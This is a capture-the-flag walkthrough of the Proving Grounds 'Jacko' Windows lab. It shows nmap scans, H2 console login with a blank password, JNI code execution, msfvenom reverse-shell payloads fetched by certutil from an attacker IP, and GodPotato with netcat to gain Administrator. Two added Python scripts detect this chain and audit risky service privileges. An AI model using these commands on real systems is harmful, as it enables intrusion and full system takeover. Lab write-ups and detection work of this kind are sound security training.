PG - Jacko


In this walkthrough, we will go through the Jacko machine from Proving Grounds. It is rated Intermediate on the platform and involves exploiting a running H2 Database instance via JNI code execution. For privilege escalation there are two routes: exploit a particular version of PaperStream IP, or use a Potato exploit to get root. So, let's get started without delay.


Machine Info:

Title:       Jacko
IP address:  192.168.229.66
Difficulty:  Intermediate
OS:          Windows
Description: Jacko is an Intermediate-level Windows machine which is vulnerable to JNI code execution in a running H2 Database instance. The privilege escalation has two routes: either exploit a particular version of PaperStream IP, or use a Potato exploit to get root.

Enumeration:

  • I started with a regular aggressive nmap scan and a full TCP port scan. Multiple ports were open on the target; the interesting ones are 80 (HTTP), 139/445 (SMB) and 8082 (HTTP).

$ sudo nmap -A 192.168.229.66
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-12 19:11 IST

Nmap scan report for 192.168.229.66
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE    SERVICE       VERSION
53/tcp   filtered domain
80/tcp   open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
8082/tcp open     http          H2 database http console
|_http-title: H2 Console
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/12%OT=80%CT=1%CU=43781%PV=Y%DS=4%DC=T%G=Y%TM=65CA206
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TS=U)OPS(O1=M54ENW8NNS%
OS:O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(W1=F
OS:FFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M
OS:54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y
OS:%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=5378%RUD=G)IE(R=N)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-12T13:42:48
|_  start_date: N/A

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   169.79 ms 192.168.45.1
2   169.76 ms 192.168.45.254
3   170.60 ms 192.168.251.1
4   170.59 ms 192.168.229.66

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds

(screenshot: nmap scan)

sudo nmap -sS -p- -T5 192.168.229.66

(screenshot: all-port scan)

  • Enumerating the web application on port 80 reveals an H2 Database Engine welcome page.

(screenshot: H2 Database Engine welcome page)

  • Next, accessing the web server on port 8082 reveals a login panel for the H2 Database Engine console.

(screenshot: H2 Database Engine login panel)

  • I tried a blank password with the default username and it logged me in.

(screenshot: H2 Database Engine console after login)

  • We are now presented with a SQL statement input field. I used the SQL statement below to test whether we can read the Windows hosts file (the equivalent of /etc/hosts), and it worked.

SELECT FILE_READ('C:/WINDOWS/System32/drivers/etc/hosts',NULL);

(screenshot: contents of the Windows hosts file)

Initial Access:

  • I looked online for known exploits for the running H2 Database version and found a JNI code execution exploit. I ran the commands listed in the exploit below and got command execution on the target.

Exploit: https://www.exploit-db.com/exploits/49384

(screenshot: using the exploit)

(screenshot: JNIScriptEngine.dll)

(screenshot: command execution as jacko\tony)

  • Next, to turn the code execution into a full shell, we first create a reverse shell binary with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=8082 -f exe > revshell.exe

(screenshot: creating the payload)

  • Now, we download the payload onto the target using certutil, again through the JNI alias.

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.45.166:8000/revshell.exe c:/windows/temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');

(screenshot: downloading the payload onto the target)

(screenshot: setting up the HTTP server)

  • Finally, execute the payload with the command below; this returns a reverse shell to our netcat listener.

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:/Windows/Temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');

(screenshot: executing the payload)

(screenshot: initial access obtained)
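From the defender's side, the whole initial-access chain above (a FILE_READ probe from the H2 console, a CREATE ALIAS that binds a SQL function to a Java class, then the JVM spawning certutil and cmd.exe) leaves two distinct traces: the SQL statements themselves and the process tree. The script below is an added example, not code from the original post or from the H2 project; it runs a few simple rules over constructed process-creation records in the shape of Sysmon Event ID 1 and over constructed H2 statements. Paths, the 192.0.2.10 address and the event field names are assumptions for the sake of the example.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation)
# records. Paths and the 192.0.2.10 address are made up for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\H2\jre\bin\java.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "java -cp h2.jar org.h2.tools.Server -web -webAllowOthers"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Program Files\H2\jre\bin\java.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://192.0.2.10:8000/revshell.exe c:\windows\temp\revshell.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\H2\jre\bin\java.exe",
     "CommandLine": r"cmd.exe /c C:\Windows\Temp\revshell.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\Temp\installer.msi SHA256"},
]

JVM_IMAGES = {"java.exe", "javaw.exe"}
# Children that a database engine's JVM has no business spawning.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "nc.exe"}
CERTUTIL_DOWNLOAD = re.compile(r"\bcertutil(?:\.exe)?\b.*?-urlcache\b.*?https?://", re.IGNORECASE)

# H2 statement patterns worth auditing in the console or query log:
# an alias bound to a Java class/method, an alias with inline Java source, or a file read.
H2_ALIAS_TO_CLASS = re.compile(r'\bCREATE\s+ALIAS\b[^;]*\bFOR\s+"', re.IGNORECASE)
H2_INLINE_JAVA = re.compile(r"\bCREATE\s+ALIAS\b[^;]*\bAS\s+\$\$", re.IGNORECASE)
H2_FILE_READ = re.compile(r"\bFILE_READ\s*\(", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_event(event: dict) -> list[str]:
    """Return sorted finding tags for one process-creation event."""
    findings = set()
    child = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    if parent in JVM_IMAGES and child in SUSPICIOUS_CHILDREN:
        findings.add("jvm_spawned_shell")   # H2 alias / JNI code execution pattern
    if CERTUTIL_DOWNLOAD.search(event["CommandLine"]):
        findings.add("certutil_download")   # LOLBin fetch of a remote file
    return sorted(findings)


def scan_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := evaluate_event(ev))]


def flag_h2_statement(sql: str) -> list[str]:
    """Return sorted tags for an H2 statement that reaches into Java or the filesystem."""
    tags = set()
    if H2_ALIAS_TO_CLASS.search(sql):
        tags.add("h2_alias_to_class")
    if H2_INLINE_JAVA.search(sql):
        tags.add("h2_inline_java")
    if H2_FILE_READ.search(sql):
        tags.add("h2_file_read")
    return sorted(tags)


if __name__ == "__main__":
    for idx, tags in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(tags)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
    for stmt in ("SELECT FILE_READ('C:/WINDOWS/System32/drivers/etc/hosts', NULL);",
                 'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";',
                 "SELECT * FROM INFORMATION_SCHEMA.TABLES;"):
        print(f"{flag_h2_statement(stmt) or ['clean']}: {stmt}")
```

The process rule is the more durable one: the SQL patterns can be rephrased, but a database JVM that becomes the parent of cmd.exe or certutil.exe is almost never legitimate. The root cause on this box is simpler still: an H2 console reachable from the network with an empty password for the default account, which is what the alias feature turns into code execution.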

  • Captured the local flag on user Tony’s Desktop.

(screenshot: local flag)

  • The shell is a little clumsy. Stabilize it with the one-liner below, which resets PATH so that the System32 binaries and PowerShell resolve from the shell.

set PATH=%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\windowspowershell\v1.0\;

whoami

Privilege Escalation:

  • Further, I looked into the applications installed on the target and found an interesting one: PaperStream IP.

dir "C:\Program Files (x86)"

(screenshot: PaperStream IP in Program Files (x86))

  • I looked inside the application folder and checked the readmeenu.rtf file, which gives the version of PaperStream IP that is installed.

cd TWAIN

type readmeenu.rtf

(screenshot: readmeenu.rtf shows PaperStream IP driver 1.42)

  • I looked online for a known exploit and found a local privilege escalation exploit for that version. I performed the setup the exploit requires, downloaded the DLL to the target and executed the exploit, but it did not grant me a shell. Strange!

Exploit: https://www.exploit-db.com/exploits/49382

msfvenom -p windows/x64/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.45.152 LPORT=445

(screenshot: creating the DLL file)

certutil.exe -urlcache -f http://192.168.45.152:8000/UninOldIS.dll C:\Windows\Temp\UninOldIS.dll

certutil.exe -urlcache -f http://192.168.45.152:8000/49382.ps1 c:/Users/tony/Desktop/49382.ps1

(screenshot: executing 49382.ps1)

  • From my earlier enumeration I knew that the current user has SeImpersonatePrivilege set, which makes it a candidate for Potato exploits. I used the GodPotato exploit below.

God potato Exploit – https://github.com/BeichenDream/GodPotato/releases

  • Downloaded the exploit onto the target and executed it with netcat to get a reverse shell at my listener on port 4444.

certutil.exe -urlcache -f http://192.168.45.152:8000/GodPotato-NET4.exe c:/Users/tony/Desktop/Godpotato.exe

certutil.exe -urlcache -f http://192.168.45.152:8000/nc.exe c:/Users/tony/Desktop/nc.exe

Godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 4444"

(screenshot: running the GodPotato exploit)

  • Got the connection back as Administrator. Finally, captured the root flag and marked the machine as complete.

(screenshot: shell as Administrator)

(screenshot: proof flag)
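The Potato route works because the account running H2 holds SeImpersonatePrivilege, which Windows grants by default to the built-in service identities. The quickest defensive check is to audit the token of every service account with `whoami /priv` and move anything that does not need impersonation to a dedicated account without it. The parser below is an added example, not code from the original post; it reads a constructed `whoami /priv` listing (the privilege set is made up for the example) and reports the privileges that commonly lead straight to SYSTEM. It parses rows by token position rather than fixed column offsets, because the column widths depend on the locale and on the longest description.

```python
# Constructed sample of `whoami /priv` output for a service account; the
# privilege set is made up for this example and was not captured from the target.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
"""

# Privileges that, held by a compromised service, commonly lead straight to SYSTEM.
# Potato-family techniques need SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}
STATES = {"Enabled", "Disabled"}


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Map privilege name -> state from `whoami /priv` output.

    Data rows start with the privilege name and end with the state; everything in
    between is the description, which may contain any number of spaces.
    """
    privileges = {}
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) >= 2 and tokens[0].startswith("Se") and tokens[-1] in STATES:
            privileges[tokens[0]] = tokens[-1]
    return privileges


def high_risk_privileges(text: str) -> list[tuple[str, str]]:
    """Return (name, state) for every high-risk privilege present in the token.

    A Disabled privilege still counts: a process can enable any privilege that is
    present in its token, so the token is as dangerous as if it were Enabled.
    """
    privs = parse_whoami_priv(text)
    return sorted((name, state) for name, state in privs.items() if name in HIGH_RISK)


if __name__ == "__main__":
    for name, state in high_risk_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:<32} {state}")
```

Feed it the real output of `whoami /priv` taken from a shell running as each service account on a build and compare the result against what the service actually needs; a database engine has no reason to hold SeImpersonatePrivilege.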


Conclusion:


So that was "Jacko" for you. We started off with a regular nmap scan and found multiple ports open on the target; the interesting ones were 80 (HTTP), 139/445 (SMB) and 8082 (HTTP). Enumerating the web server on port 8082 revealed a login panel for the H2 Database Engine console, and a blank password with the default username logged us in. Looking online for known exploits for the running H2 Database version turned up a JNI code execution exploit, which we used to get initial access on the target. For privilege escalation we had two routes: exploit a particular version of PaperStream IP, or use a Potato exploit to get root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".
